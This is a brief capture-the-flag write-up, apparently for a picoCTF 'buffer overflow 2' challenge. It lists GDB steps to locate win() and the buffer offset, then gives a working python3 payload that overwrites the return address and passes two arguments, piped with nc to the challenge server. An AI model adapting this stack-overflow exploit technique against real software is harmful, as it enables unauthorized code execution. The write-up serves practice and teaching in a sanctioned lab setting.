Skip to content

buffer overflow 2

  1. vuln.c _. we need to call win() with two arguments: 0xCAFEF00D, 0xFOODFOOD
  2. GDB -> set breakpoint in vuln() after gets(), run and give a string of a's as input
  3. disas win, i f & x/100xg $ebp-200 give the following:
    • win() is at 0x08049296
    • buffer starts at ebp-0x6c
  4. We know that:
    • return address is at ebp+4
    • first arg is at ebp+8

  5. The following works:

    shell python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x70 + b"\x96\x92\x04\x08" + b"B"*4 + b"\x0d\xf0\xfe\xca" + b"\x0d\xf0\x0d\xf0\n")' | nc saturn.picoctf.net 50486